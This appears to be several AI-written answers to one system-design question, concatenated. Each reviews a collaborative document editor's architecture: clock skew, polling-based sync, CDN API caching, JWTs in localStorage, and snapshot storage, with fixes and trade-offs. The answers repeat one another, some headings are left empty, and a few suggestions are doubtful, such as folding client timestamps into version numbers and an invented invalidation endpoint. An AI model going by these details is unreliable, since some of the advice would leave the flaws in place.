6. Snapshot Service → PostgreSQL (periodic full saves)
The architecture has good fundamentals but needs these enhancements for production readiness at scale. The most critical gap is the lack of real-time synchronization between servers, which would cause immediate user-visible inconsistencies.
This is a fascinating architecture with several critical flaws that would manifest at scale. Let me break down the issues systematically.
Issue: Last-write-wins with client timestamps is fundamentally broken. Clients have unsynchronized clocks (± seconds), network delays add variable latency, and malicious users could manipulate timestamps.
Example: User A (clock 2s fast) and User B (clock 2s slow) edit simultaneously. The skew makes User B's timestamp 4 seconds earlier than User A's, so User A's edit "wins" regardless of which edit actually happened last in real time.
Solution: Use hybrid logical clocks (HLC) or vector clocks. Each server assigns monotonically increasing logical timestamps that combine wall-clock time with sequence numbers.
Trade-off: Slightly more complex conflict resolution logic, but eliminates clock skew issues entirely.
Issue: With 2-second polling intervals, servers have inconsistent views of document state for up to 2 seconds. Two users connected to different servers could make conflicting edits that both appear valid locally.
Example:
Solution: Implement distributed locks or optimistic concurrency control with version numbers. Each document edit should include the version it was based on.
Trade-off: Increased latency for conflict detection, potential for more edit rejections.
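A minimal sketch of the version-number check (names illustrative; in production the compare-and-set would be a conditional `UPDATE ... WHERE version = $base`):

```javascript
// Optimistic concurrency control: every edit carries the document version it
// was based on. The server rejects edits based on a stale version, so the
// client must rebase and retry instead of silently overwriting a concurrent
// edit.
class VersionedDoc {
  constructor(text = '') {
    this.text = text;
    this.version = 0;
  }
  // Returns { ok: true, version } on success,
  // or { ok: false, current } on a version conflict.
  applyEdit(baseVersion, newText) {
    if (baseVersion !== this.version) {
      return { ok: false, current: this.version }; // stale base: client rebases
    }
    this.text = newText;
    this.version += 1;
    return { ok: true, version: this.version };
  }
}
```

The rejection path is exactly the "more edit rejections" trade-off noted above: correctness is bought by making the slower client redo its merge.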
Issue: All writes go to a single PostgreSQL primary. With many concurrent editors, this becomes a severe bottleneck. The 30-second full HTML snapshots will cause massive I/O spikes.
Example: 1000 users editing different documents = 1000 writes/second to PostgreSQL, plus 33 full document writes/second for snapshots.
Solution:
Trade-off: More complex recovery procedures, potential for data loss if queue fails.
Issue: Load balancer uses round-robin, but WebSocket connections are sticky. Users on the same document might connect to different servers, creating synchronization islands.
Solution: Consistent hashing based on document ID, or a pub/sub layer (Redis Pub/Sub) for cross-server communication.
Trade-off: Consistent hashing reduces load balancing flexibility. Pub/Sub adds network hops.
Issue: Caching API responses for 5 minutes is disastrous for a real-time editor. Users will see stale document content.
Solution: Only cache static assets. API responses should have Cache-Control: no-store.
Trade-off: Higher origin load, but correctness is non-negotiable.
Issue: If a WebSocket drops mid-edit, the user's changes are lost. No acknowledgment mechanism exists.
Solution: Client-side change queue with acknowledgments. Changes persist locally until confirmed by server.
Trade-off: More complex client logic, potential for duplicate edits if not handled carefully.
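A sketch of that client-side queue (names illustrative; the `send` callback stands in for `ws.send`). Client-assigned ids are what make the resend-on-reconnect path idempotent on the server:

```javascript
// Each local edit gets a client-assigned id, stays queued until the server
// acknowledges it, and is resent after a reconnect. The server dedupes by id,
// so a resend of an already-applied op is harmless.
class PendingQueue {
  constructor(send) {
    this.send = send;   // transport callback (ws.send in production)
    this.pending = [];  // ops sent but not yet acknowledged
    this.nextId = 1;
  }
  submit(op) {
    const entry = { id: this.nextId++, op };
    this.pending.push(entry);
    this.send(entry);
    return entry.id;
  }
  ack(id) {
    this.pending = this.pending.filter((e) => e.id !== id);
  }
  // After a reconnect, resend everything still unacknowledged, in order.
  resendAll() {
    for (const entry of this.pending) this.send(entry);
  }
}
```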
Issue: PostgreSQL failover (even with replicas) can lose recent writes. The 30-second snapshot interval means up to 30 seconds of edits could vanish.
Solution: Synchronous replication to at least one standby, or use a distributed database (CockroachDB, YugabyteDB).
Trade-off: Synchronous replication increases write latency. Distributed databases have different consistency models.
Issue: JWTs in localStorage are vulnerable to XSS attacks. A single XSS vulnerability compromises all user sessions.
Solution: Use HTTP-only cookies with CSRF protection. Implement short-lived tokens with refresh tokens.
Trade-off: More complex auth flow, potential CSRF vulnerabilities if not implemented correctly.
Issue: Last-write-wins is the simplest but worst conflict resolution for collaborative editing. It causes frequent data loss.
Solution: Implement OT (Operational Transformation) or CRDTs for true collaborative editing.
Trade-off: Significantly more complex implementation, higher CPU/memory usage.
Issue: Users might read from replicas that are behind the primary, seeing outdated document versions while trying to edit.
Solution: Session consistency - direct a user's reads to the replica that has their writes, or use read-after-write consistency guarantees.
Trade-off: Reduced read scalability, more complex routing.
1. Use CRDTs (like Yjs or Automerge) for conflict resolution
2. Implement WebSocket gateway with Redis Pub/Sub for cross-server sync
3. Use change streams (MongoDB) or logical decoding (PostgreSQL) instead of polling
4. Store document deltas, not full snapshots
5. Implement proper write-ahead logging with idempotent operations
6. Use HTTP-only cookies for auth with refresh token rotation
7. Add client-side operation queue with acknowledgments
8. Implement proper monitoring for sync lag and conflict rates
The most critical issues to address immediately are:
Without these changes, this system would lose user data regularly and become increasingly inconsistent as it scales.
Issue: Users may experience interruptions due to unstable networks or server load balancer timeouts. Solution: Implement automatic reconnection logic with exponential backoff on the client side. Additionally, maintain an operational state in IndexedDB for offline operations, then sync when reconnected. Enhanced connection monitoring with heartbeat messages can detect failures early. Trade-offs: Increased client complexity and potential duplication of operations during reconnects that need reconciliation.
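A sketch of the backoff schedule (function and parameter names are illustrative). Full jitter matters here: without it, a server restart makes thousands of clients retry in lockstep.

```javascript
// Exponential backoff with full jitter, capped at a maximum: the delay
// ceiling doubles per attempt, and the actual delay is uniform in
// [0, ceiling) so reconnects spread out instead of arriving in waves.
function backoffDelay(attempt, { baseMs = 500, maxMs = 30000, random = Math.random } = {}) {
  const ceiling = Math.min(maxMs, baseMs * 2 ** attempt);
  return Math.floor(random() * ceiling);
}
```

The client calls this with its consecutive-failure count, resetting the count to zero after a successful reconnect.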
Issue: The primary PostgreSQL database represents a single point of failure. Solution: Set up a synchronous standby replica in a different availability zone that can take over immediately. Implement database connection pooling to manage connections efficiently. Use a circuit breaker pattern to handle database failures gracefully. Trade-offs: Synchronous replication adds some latency but provides stronger data consistency guarantees.
Issue: Redis failure could lead to session data loss and user disruption. Solution: Deploy Redis in a clustered configuration with replication. Implement a cache warming strategy to speed up recovery. Fall back to database lookups for critical data. Trade-offs: Increased infrastructure complexity but improved resilience.
Issue: During network partitions, different server instances might accept conflicting changes to the same document. Solution: Implement a consensus protocol like Raft to decide which server instance is the leader during partitions. Define a conflict resolution policy with explicit user notification. Implement partition detection using distributed coordination services like ZooKeeper. Trade-offs: Increased system complexity but improved consistency during network issues.
Issue: Unexpected crashes could cause in-flight changes to be lost. Solution: Implement an operational change queue that persists pending operations to disk. Persist document changes to a write-ahead log before acknowledging them. Implement a document versioning system to allow reconstruction of document state after server restarts. Trade-offs: Increased storage requirements but improved data integrity.
Issue: Last-write-wins with timestamps can lead to data loss if two users edit the same paragraph at the same time. Solution: Implement operational transformation (OT) or conflict-free replicated data types (CRDTs) to handle concurrent edits intelligently. These algorithms can merge changes without data loss. Additionally, implement an undo/redo mechanism with branching to allow users to revert changes if needed. Trade-offs: Increased computational complexity but significantly improved user experience by preserving all edits.
Issue: Client clock skew can cause conflict resolution inconsistencies. Solution: Use vector clocks instead of simple timestamps to establish partial ordering of events. Record timestamps from multiple clients and servers. Implement a bounded clock skew tolerance with a hybrid logical clock mechanism. Trade-offs: Increased complexity but correct resolution of concurrent edits despite clock skew.
Issue: During the 2-second polling interval, servers might have outdated document states. Solution: Implement an inter-server communication mechanism using a message queue like RabbitMQ or Apache Kafka. Changes should be fanned out to all servers immediately rather than relying on polling. For truly real-time consistency, maintain server-to-server WebSocket connections. Trade-offs: Increased infrastructure complexity but reduced synchronization delay.
Issue: The mechanism of saving full HTML snapshots every 30 seconds could overwrite more recent changes. Solution: Implement an operational log that records each change as it occurs. The snapshot should only be considered a savepoint, not the sole storage mechanism. Create snapshots only when the document is idle for at least 30 seconds. Store snapshots as differential patches instead of full HTML. Trade-offs: Increased storage complexity but reduced risk of data loss.
Issue: As the system scales, the primary PostgreSQL database will become a bottleneck due to connection limits. Solution: Implement database connection pooling. Use read replicas for read-heavy operations. Consider partitioning the database by organization ID to distribute the load. Trade-offs: Increased complexity but improved throughput and reduced contention.
Issue: The current polling-based cross-server synchronization will become inefficient at scale. Solution: Use a distributed message queue (RabbitMQ, Apache Kafka) for inter-server communication. When a change occurs, fan it out to all servers via the message queue rather than relying on polling. Implement an event-driven architecture for change propagation. Trade-offs: Increased infrastructure complexity but reduced polling overhead and improved real-time consistency.
Issue: Storing full HTML snapshots every 30 seconds consumes significant memory. Solution: Store only changes in a sequential log structure. Reconstruct document state on demand. Implement a retention policy where only recent snapshots are kept in memory. Trade-offs: Increased complexity but reduced storage requirements and improved performance.
Issue: As documents become popular, a single server instance might be overwhelmed by WebSocket connections. Solution: Implement connection draining to redistribute connections when servers are under heavy load. Consider sharding documents across multiple servers based on document ID rather than server count alone. Implement a pub/sub pattern for broadcasting changes to clients. Trade-offs: Increased complexity but improved load distribution and scalability.
Issue: Caching API responses for 5 minutes could lead to stale document data. Solution: Implement cache invalidation via publish-subscribe when documents change. Set shorter cache TTLs for frequently changing documents, longer for stable ones. Implement conditional requests with ETags to reduce stale data risk. Trade-offs: Increased complexity but improved data freshness.
This architecture analysis reveals several critical issues that need to be addressed. The most critical are the potential data loss from last-write-wins conflict resolution, the single point of failure in the database, and the race conditions introduced by client clock skew.
Implementing operational transformation or CRDTs should be a top priority to ensure data consistency. The database layer needs high availability configuration, and the inter-server communication should be moved from polling to event-driven mechanisms.
For scaling, document sharding strategies and moving to event-driven cross-server synchronization will be essential. The architecture is generally sound but requires these enhancements to be production-ready.
Issue: With round-robin load balancing, users editing the same document might connect to different servers, creating significant sync delays.
Solution: Implement Document-Affinity Routing
Issue: Client clocks are unreliable, causing incorrect conflict resolution.
Solution: Implement Vector Clocks + Server Sequencing
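As a sketch of the server-sequencing half (the in-memory map and operation shape are illustrative): the server, not the client clock, assigns the authoritative order.

```javascript
// Per-document monotonic sequence numbers assigned on the server.
const sequences = new Map(); // docId -> last assigned sequence number

function sequenceOperation(docId, op) {
  const next = (sequences.get(docId) || 0) + 1;
  sequences.set(docId, next);
  // The client timestamp is kept for diagnostics only; ordering uses the sequence.
  return { ...op, serverSequenceNumber: next };
}
```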
Each change carries `(clientId, clientTimestamp, serverSequenceNumber)`; the `serverSequenceNumber` has final authority.
Issue: Broadcasting only to connected WebSocket clients creates inconsistent views.
Solution: Operational Transform (OT) with Redis Pub/Sub
Pipeline: transform → apply → broadcast.
Issue: Storing full HTML every 30 seconds is extremely inefficient.
Solution: Operational Log + Delta Compression
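A toy version of the operational-log idea, assuming insert-only operations: changes accumulate in a log and are periodically compacted into a snapshot, instead of persisting full HTML every 30 seconds.

```javascript
// Operational log with periodic compaction into a snapshot.
class OpLog {
  constructor() {
    this.snapshot = ''; // last compacted state
    this.ops = [];      // operations applied since the snapshot
  }
  append(op) {          // op: { position, text }
    this.ops.push(op);
  }
  materialize() {       // replay the log on top of the snapshot
    let doc = this.snapshot;
    for (const { position, text } of this.ops) {
      doc = doc.slice(0, position) + text + doc.slice(position);
    }
    return doc;
  }
  compact() {           // fold the log into a new snapshot, then truncate it
    this.snapshot = this.materialize();
    this.ops = [];
  }
}
```

A real implementation would also support deletes and delta compression, but the storage win comes from the same log-then-compact structure.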
Issue: Every keystroke hits PostgreSQL, creating write pressure.
Solution: Write-Through Cache Pattern
`SET doc:operations:<docId> <operations>`
Issue: XSS attacks can steal tokens, and the 24-hour expiry is too long.
Solution: Token Rotation + HttpOnly Cookies
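A sketch of the cookie half of this solution; the cookie name, path, and lifetime are illustrative. The refresh token lives in an `HttpOnly` cookie (invisible to page scripts, so XSS cannot read it), while short-lived access tokens are kept in memory only:

```javascript
// Build a Set-Cookie header value for a rotating refresh token.
function refreshCookieHeader(refreshToken) {
  return [
    `refresh_token=${refreshToken}`,
    'HttpOnly',            // not readable from JavaScript (mitigates XSS theft)
    'Secure',              // HTTPS only
    'SameSite=Strict',     // blunts CSRF
    'Path=/auth/refresh',  // only sent to the refresh endpoint
    'Max-Age=604800'       // 7 days; the token itself is rotated on every use
  ].join('; ');
}
```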
Issue: 5-minute cache on API responses breaks real-time collaboration.
Solution: Cache-Control Headers
`Cache-Control: no-cache, no-store, must-revalidate` for API responses.
Issue: Each WebSocket connection consumes ~2MB of memory.
Solution: WebSocket Connection Pooling
Issue: PostgreSQL has hard connection limits (typically 100-200).
Solution: Connection Pooling + PgBouncer
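The back-of-envelope sizing behind this solution (numbers are assumptions): keep the sum of all API servers' pool sizes under the PostgreSQL connection limit, with headroom for admin sessions, and let PgBouncer in transaction-pooling mode multiplex many application clients onto those connections.

```javascript
// Compute a safe per-server pool size given the Postgres connection limit.
function poolSizePerServer(pgMaxConnections, apiServerCount, headroom = 10) {
  return Math.max(1, Math.floor((pgMaxConnections - headroom) / apiServerCount));
}
// e.g. a 100-connection Postgres with 20 API servers -> 4 connections each
```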
Issue: Redis failure breaks session cache and inter-server sync.
Solution: Redis Sentinel + Partition Tolerance
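An illustrative client configuration for Sentinel-based failover; the shape below is what ioredis accepts, but the hostnames and master-set name are placeholders:

```javascript
// Sentinel-aware connection options: the client asks the sentinels for the
// current master and reconnects automatically after a failover.
const sentinelOptions = {
  sentinels: [
    { host: 'sentinel-1', port: 26379 },
    { host: 'sentinel-2', port: 26379 },
    { host: 'sentinel-3', port: 26379 }
  ],
  name: 'collab-master',     // the monitored master set
  enableOfflineQueue: true   // buffer commands while failover is in progress
};
// With ioredis installed: const redis = new Redis(sentinelOptions);
```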
Issue: Server restart causes thousands of simultaneous reconnections.
Solution: Exponential Backoff + Sticky Sessions
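A minimal sketch of the client-side delay calculation (base and cap values are assumptions): exponential backoff with full jitter spreads reconnections out, so a restarted server is not hit by thousands of simultaneous handshakes.

```javascript
// Delay before reconnect attempt N: exponential growth, capped, fully jittered.
function reconnectDelayMs(attempt, baseMs = 500, capMs = 30000) {
  const exp = Math.min(capMs, baseMs * 2 ** attempt);
  return Math.floor(Math.random() * exp); // full jitter spreads the herd
}
```

The client calls this after each failed attempt and resets `attempt` to 0 once a connection succeeds.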
```mermaid
graph TD
    A[React SPA] --> B[API Gateway<br/>with WS routing]
    B --> C[Document Router<br/>Consistent Hashing]
    C --> D[Node.js Server<br/>Document Shard 1]
    C --> E[Node.js Server<br/>Document Shard 2]
    D --> F[Redis Stream<br/>Operations Log]
    E --> F
    F --> G[Compaction Service<br/>PostgreSQL Writer]
    G --> H[PostgreSQL<br/>Document Store]
    D --> I[Redis Pub/Sub<br/>Cross-server sync]
    E --> I
    J[CDN] --> K[Static Assets<br/>No API caching]
```
| Priority | Issue | Solution | Effort | Impact |
|---|---|---|---|---|
| P0 | Client timestamps | Vector clocks + server sequencing | Medium | Critical |
| P0 | Storage inefficiency | Operational log + delta compression | High | Critical |
| P1 | Cross-server sync | Redis Pub/Sub for real-time | Medium | High |
| P1 | JWT security | Token rotation + HttpOnly | Medium | High |
| P2 | Connection balancing | Document affinity routing | High | Medium |
| P2 | Database writes | Write-through cache pattern | Medium | Medium |
| P3 | CDN caching | Cache-control headers | Low | Low |
These changes move the system from a brittle prototype toward a production-ready collaborative editor in the mold of Google Docs.
Problem: Changes only broadcast to clients connected to the same server. Clients on other servers must wait up to 2 seconds for polling.
Solution: Implement Redis Pub/Sub for cross-server communication
```javascript
// When a server receives a change, publish it to the document's channel.
// Note: Redis requires separate connections for publishing and subscribing.
publisherClient.publish(`document:${docId}:changes`, JSON.stringify(change));
// On a dedicated subscriber connection (per server, at startup or on first open):
subscriberClient.subscribe(`document:${docId}:changes`);
```
Trade-offs:
Problem: Last-write-wins based on client timestamps is unreliable (clock skew, malicious clients).
Solution: Implement Operational Transformation (OT) or CRDTs
```javascript
// Example OT transform for insert operations: if op1 inserted text at or
// before op2's position, op2 must shift right by the inserted length.
class OperationalTransform {
  static transform(op1, op2) {
    if (op1.position <= op2.position) {
      return { ...op2, position: op2.position + op1.length };
    }
    return op2;
  }
}
```
Trade-offs:
Problem: Full HTML snapshots every 30 seconds can overwrite concurrent changes.
Solution: Implement versioned storage with branching
```sql
CREATE TABLE document_versions (
  id SERIAL PRIMARY KEY,
  document_id UUID,
  version INT,
  parent_version INT,
  content TEXT,
  created_at TIMESTAMP,
  merged BOOLEAN DEFAULT FALSE
);
```
Trade-offs:
Problem: Multiple servers writing to PostgreSQL simultaneously.
Solution: Implement optimistic locking
```sql
ALTER TABLE documents ADD COLUMN version INT DEFAULT 1;

-- The update succeeds only if no one else bumped the version in the meantime;
-- zero rows updated means the client must re-read and retry.
UPDATE documents
SET content = :newContent, version = version + 1
WHERE id = :docId AND version = :expectedVersion;
```
Trade-offs:
Problem: 24-hour JWT tokens in localStorage are vulnerable to XSS attacks.
Solution: Implement refresh token rotation
```javascript
// Use httpOnly cookies for refresh tokens
// Short-lived access tokens (15 minutes)
// Rotate refresh tokens on each use
```
Trade-offs:
Problem: Every keystroke writes to PostgreSQL, creating write amplification.
Solution: Implement write-through cache with batching
```javascript
// Buffer changes in memory and flush to PostgreSQL in batches
const changeBuffer = new Map();
setInterval(async () => {
  if (changeBuffer.size === 0) return;
  // Swap the buffer first so changes arriving during the async write aren't lost
  const batch = Array.from(changeBuffer.values());
  changeBuffer.clear();
  await batchWriteToPostgres(batch);
}, 1000); // Batch every second
```
Trade-offs:
Problem: 5-minute CDN cache on API responses causes stale data.
Solution: Implement cache invalidation strategy
```javascript
// Use surrogate keys for fine-grained invalidation
res.set('Surrogate-Key', `doc-${docId} org-${orgId}`);

// Invalidate on updates (endpoint shown is illustrative; real CloudFront
// invalidations go through the AWS SDK's CreateInvalidation API)
await fetch(`https://api.cloudfront.com/invalidate`, {
  method: 'POST',
  body: JSON.stringify({ paths: [`/api/documents/${docId}`] })
});
```
Trade-offs:
Problem: Users lose changes when WebSocket disconnects.
Solution: Implement offline queue with exponential backoff
```javascript
class OfflineQueue {
  constructor() {
    // Restore anything queued before the last page unload
    this.queue = JSON.parse(localStorage.getItem('offline-queue') || '[]');
    this.backupInterval = setInterval(() => this.backupToLocal(), 5000);
  }
  enqueue(change) {
    this.queue.push(change);
    this.backupToLocal();
  }
  backupToLocal() {
    localStorage.setItem('offline-queue', JSON.stringify(this.queue));
  }
}
```
Trade-offs:
Problem: In-flight writes lost on server crash.
Solution: Implement write-ahead log
```javascript
// Write to the WAL before processing (uuid() and `operation` assumed in scope)
await redis.lpush(`wal:${docId}`, JSON.stringify({
  id: uuid(),
  operation: operation,
  timestamp: Date.now()
}));

// Replay unprocessed entries from the WAL on startup
const wal = await redis.lrange(`wal:${docId}`, 0, -1);
```
Trade-offs:
Problem: Full HTML snapshots become expensive for large documents.
Solution: Implement chunked storage with CRDTs
```javascript
// Store the document as fixed-size chunks (the chunk type itself is elided);
// a full implementation must also handle inserts that span chunk boundaries
const CHUNK_SIZE = 1000; // characters per chunk
class ChunkedDocument {
  chunks = new Map();
  insert(text, position) {
    const chunkIndex = Math.floor(position / CHUNK_SIZE);
    const chunk = this.chunks.get(chunkIndex);
    if (!chunk) throw new Error(`chunk ${chunkIndex} not loaded`);
    chunk.insert(text, position % CHUNK_SIZE);
  }
}
```
Trade-offs:
```javascript
// Implement a hybrid approach
const EnhancedArchitecture = {
  // Use CRDTs for conflict-free collaboration
  syncStrategy: 'CRDT_with_vector_clocks',
  // Event sourcing for audit trail
  storage: 'event_sourcing_with_snapshots',
  // Redis Streams for reliable message delivery
  realTime: 'redis_streams_with_consumer_groups',
  // Implement circuit breakers
  resilience: 'circuit_breaker_with_fallback',
  // Use consistent hashing for document distribution
  scaling: 'consistent_hashing_by_document_id'
};
```
This comprehensive approach addresses the most critical issues first while building toward a more robust, scalable architecture.
Here are the critical issues in this architecture, categorized by type:
1. Client Clock Synchronization in Last-Write-Wins
2. Race Between Broadcast and Persistence
3. Read Replica Lag → Stale Data
4. PostgreSQL Polling Thundering Herd
`document_id`. Servers use consumer groups to subscribe only to documents their clients are actively editing.
5. Per-Change PostgreSQL Writes
`fsync=everysec` and replication factor of 3. Reduces PostgreSQL write load by 95%.
6. Full HTML Snapshot Storage
7. CDN API Response Caching
`Cache-Control: private, no-cache, max-age=0` for all document API endpoints. Use CDN only for static assets (JS, CSS). For performance, implement edge-side rendering with 1-second TTL and surrogate-key purging on updates.
8. WebSocket Server Crash
client_id, document_id, last_acknowledged_op) in Redis with TTL. On reconnection, clients resume from `last_acknowledged_op`. Use Redis Streams consumer groups to allow other servers to take over disconnected clients' subscriptions.
9. Message Broker Partition
10. Database Connection Exhaustion
11. JWT in localStorage (XSS Risk)
12. No Rate Limiting on WebSocket Messages
13. Load Balancer WebSocket Stickiness
`client_id` in query param for better distribution.
| Component | Current | Recommended | Impact |
|---|---|---|---|
| Sync Strategy | Client timestamps + LWW | CRDTs (Yjs) + HLC | Fixes data loss, enables offline editing |
| Cross-server comms | PostgreSQL polling (2s) | Redis Streams | Real-time sync, 95% DB load reduction |
| Storage | Full HTML snapshots | Operations log + snapshots | 95% storage savings, enables undo/redo |
| Auth | JWT in localStorage | httpOnly cookies + rotation | Mitigates XSS, enables revocation |
| CDN | API cached 5min | API no-cache, assets cached | Fixes stale data, increases origin load |
| Persistence | Per-change writes | Batch async writes (500ms) | 95% write load reduction |
| Session State | Server memory | Redis with TTL | Enables failover, adds 5ms latency |
The architecture requires significant changes to be production-ready, particularly replacing the synchronization strategy and message bus. The trade-offs consistently favor complexity and latency over data loss and inconsistency, which is the correct priority for a collaborative editor.
This architecture contains several critical flaws that would prevent real-time collaboration, create data consistency issues, and cause catastrophic failures at scale. Here are the specific problems and solutions:
Problem: With round-robin load balancing and server-isolated WebSocket broadcasts, users connected to different API servers won't see each other's changes in real-time. Server A broadcasts only to its clients, while Server B discovers changes by polling PostgreSQL every 2 seconds.
Race Condition: User A (Server 1) and User B (Server 2) edit simultaneously. User A sees their change immediately; User B sees it 2 seconds later. During that window, User B edits stale content, creating a conflict that appears as a "jump" when the merge happens.
Solution: Implement Redis Pub/Sub (or NATS/RabbitMQ) as a message bus between API servers.
Channel: `doc:{id}:changes`
Trade-offs:
Problem: Using client timestamps for "last-write-wins" is unreliable. If User A's laptop clock is 5 minutes fast (common with manual time changes or NTP failures), their edits permanently overwrite User B's concurrent edits, even if B typed later.
Race Condition:
T+0: User A (clock +5 min) edits paragraph → client timestamp reads T+5:00
T+1: User B (correct clock) edits same paragraph → client timestamp reads T+0:01
T+2: LWW compares timestamps: A's inflated timestamp appears "later"
T+3: A's edit wins, silently discarding B's chronologically later edit
Solution: Implement Hybrid Logical Clocks (HLC) or server-assigned monotonic sequence numbers.
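One minimal shape of that rule (the exact semantics are an assumption; real HLCs track the logical component separately): the assigned version is always greater than anything the server has seen, so a skewed client timestamp can nudge the version forward but can never move the document backwards.

```javascript
// HLC-style version assignment: monotone even under client clock skew.
function nextVersion(lastVersion, serverTimestamp, clientTimestamp) {
  return Math.max(lastVersion, serverTimestamp, clientTimestamp) + 1;
}
```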
`version = max(server_timestamp, client_timestamp) + 1`
Trade-offs:
Problem: Writing every keystroke to PostgreSQL creates a write storm. With 1000 concurrent users typing 3 chars/second, that is 3,000 writes/sec, while read replicas fall further behind as replication delay grows.
Failure Mode: During traffic spikes, PostgreSQL connection pool exhaustion causes cascading failures. The 2-second polling from N servers creates N/2 queries per second per document.
Solution: Implement Event Sourcing with Kafka + In-Memory CRDT State.
Trade-offs:
Problem: CloudFront caching API responses for 5 minutes means:
Solution: Disable caching for all /api/* and /ws/* routes. Use CDN only for static assets (React bundle, CSS, images). Implement separate domains: static.example.com (CDN) vs api.example.com (no cache).
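A path-based sketch of the same split (the route prefixes and header values are illustrative): API and WebSocket routes are never cached, while fingerprinted static bundles are cached aggressively.

```javascript
// Decide cache headers by route class.
function cacheHeadersFor(path) {
  if (path.startsWith('/api/') || path.startsWith('/ws/')) {
    // Document data must never be served stale from the CDN
    return { 'Cache-Control': 'private, no-store' };
  }
  // Fingerprinted static bundles can be cached for a year
  return { 'Cache-Control': 'public, max-age=31536000, immutable' };
}
```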
Trade-offs:
Problem: Storing JWT in localStorage makes it vulnerable to XSS attacks. A malicious script can steal the token and impersonate the user for 24 hours.
Solution: Use HttpOnly, Secure, SameSite=Strict cookies for the session ID.
Trade-offs:
`/refresh` endpoint
Problem: Round-robin load balancing without sticky sessions means:
Solution: Implement IP Hash or Cookie-based sticky sessions on the load balancer.
Trade-offs:
Problem: Full HTML snapshots every 30 seconds create:
Solution: Store operation logs (deltas) not snapshots.
Trade-offs:
Problem: If Server 1 crashes after writing to PostgreSQL but before broadcasting via Redis Pub/Sub, the edit is persisted but never reaches other users. They continue editing an old version, creating a "fork" in the document history.
Solution: Implement Server-Sent Events (SSE) for critical updates + Vector Clocks for version tracking.
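A sketch of the vector-clock comparison this relies on (the object-map representation is an assumption): detecting that neither history dominates the other is exactly how a "fork" is recognized.

```javascript
// Compare two vector clocks; returns 'before', 'after', 'equal', or 'concurrent'.
function compareVectorClocks(a, b) {
  let aAhead = false;
  let bAhead = false;
  for (const key of new Set([...Object.keys(a), ...Object.keys(b)])) {
    const av = a[key] || 0;
    const bv = b[key] || 0;
    if (av > bv) aAhead = true;
    if (bv > av) bAhead = true;
  }
  if (aAhead && bAhead) return 'concurrent'; // a fork: needs merge/transform
  if (aAhead) return 'after';
  if (bAhead) return 'before';
  return 'equal';
}
```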
`last_seen_version` to server
Trade-offs:
Problem: As you add more API servers, the 2-second polling interval creates a thundering herd on PostgreSQL. With 100 servers polling 1000 active documents: 100 × 1000 / 2 = 50,000 queries/second just for polling.
Solution: Reverse the polling direction. Use Redis Keyspace Notifications or PostgreSQL LISTEN/NOTIFY (built into all supported Postgres versions; payloads are limited to roughly 8 KB, so notify with the document ID and fetch the change separately).
`doc:{id}:notify`
`SUBSCRIBE` instead of polling
Trade-offs:
Problem: "Last-write-wins at paragraph level" provides terrible UX. If two users type in the same paragraph simultaneously, one user's entire edit disappears.
Solution: Integrate Yjs or Automerge protocol.
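To make the convergence property concrete, here is a toy state-based CRDT: an LWW register with a deterministic tie-break, which is enough to show that merges commute. (This is an illustration only; real text editing needs sequence CRDTs like those inside Yjs or Automerge.)

```javascript
// State-based LWW register: merge picks the higher logical timestamp,
// breaking ties deterministically on replica id so every replica agrees.
function mergeLww(a, b) {
  if (a.ts !== b.ts) return a.ts > b.ts ? a : b;
  return a.replica > b.replica ? a : b;
}

const atAlice = { value: 'Alice edit', ts: 2, replica: 'alice' };
const atBob = { value: 'Bob edit', ts: 2, replica: 'bob' };

// Merge in either order: both replicas converge to the same winner
const merged1 = mergeLww(atAlice, atBob);
const merged2 = mergeLww(atBob, atAlice);
```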
Trade-offs:
| Priority | Fix | Impact |
|---|---|---|
| P0 | Replace polling with Redis Pub/Sub | Enables real-time collaboration |
| P0 | Remove CDN caching on API | Prevents data corruption |
| P0 | Move JWT to HttpOnly cookies | Security compliance |
| P1 | Implement CRDTs (Yjs) | Correct conflict resolution |
| P1 | Buffer writes in Redis, batch to Postgres | Supports >10k concurrent users |
| P2 | Add sticky sessions | Prevents reconnection storms |
Without these changes, the system will fail under load of ~100 concurrent users due to database contention and will provide a broken collaboration experience (2-second delays, lost edits).
Potential Failure Modes:
Single Point of Failure (SPOF) in Load Balancer: If the load balancer fails, all incoming traffic will be lost. Solution: Use multiple load balancers in a high-availability configuration, such as a master-slave setup with automatic failover. Trade-off: Additional complexity and cost.
Database Connection Pool Exhaustion: If too many API servers connect to the database simultaneously, the connection pool may become exhausted. Solution: Implement a connection pooling mechanism that can scale with the number of API servers, or consider using a message queue to handle updates. Trade-off: Additional complexity and potential performance impact.
Client-Side WebSocket Connection Failure: If a client's WebSocket connection is lost, they may not receive updates or be able to send changes. Solution: Implement automatic reconnection with exponential backoff, and consider using a message queue to handle updates. Trade-off: Additional complexity and potential performance impact.
Server-Side WebSocket Connection Failure: If an API server's WebSocket connections are lost, clients will not receive updates or be able to send changes. Solution: Implement automatic reconnection with exponential backoff, and consider using a message queue to handle updates. Trade-off: Additional complexity and potential performance impact.
Auth Token Expiration: If a user's auth token expires, they will be logged out and unable to access the document. Solution: Implement automatic token renewal or consider using a longer-lived token. Trade-off: Potential security risks if tokens are not properly secured.
CDN Cache Invalidation: If the CDN cache is not properly invalidated, users may see stale data. Solution: Implement a cache invalidation mechanism that updates the CDN cache when data changes. Trade-off: Additional complexity and potential performance impact.
Race Conditions:
Last-Write-Wins Conflict Resolution: If two users edit the same paragraph simultaneously, the last write may win, potentially causing data loss for the first user. Solution: Implement a more sophisticated conflict resolution mechanism, such as operational transformation or multi-version concurrency control. Trade-off: Additional complexity and potential performance impact.
Database Update Race Conditions: If multiple API servers update the database simultaneously, race conditions may occur. Solution: Implement a locking mechanism or consider using a message queue to handle updates. Trade-off: Additional complexity and potential performance impact.
Scaling Bottlenecks:
Database Write Bottleneck: As the number of users increases, the database may become a bottleneck due to high write traffic. Solution: Implement a sharding mechanism to distribute write traffic across multiple databases. Trade-off: Additional complexity and potential data consistency issues.
API Server WebSocket Connection Bottleneck: As the number of users increases, API servers may become bottlenecked due to high WebSocket connection traffic. Solution: Implement a connection pooling mechanism or consider using a message queue to handle updates. Trade-off: Additional complexity and potential performance impact.
CDN Cache Hit Bottleneck: As the number of users increases, the CDN cache may become bottlenecked due to high traffic. Solution: Implement a caching mechanism that can scale with traffic, or consider using a content delivery network with built-in caching. Trade-off: Additional complexity and potential performance impact.
Redis Session Cache Bottleneck: As the number of users increases, the Redis session cache may become bottlenecked due to high traffic. Solution: Implement a sharding mechanism to distribute session cache traffic across multiple Redis instances. Trade-off: Additional complexity and potential data consistency issues.
Each proposed solution comes with its trade-offs, requiring careful consideration of the specific needs and constraints of the collaborative document editor.
By addressing these potential failure modes, race conditions, and scaling bottlenecks, you can improve the reliability, performance, and scalability of your real-time collaborative document editor.
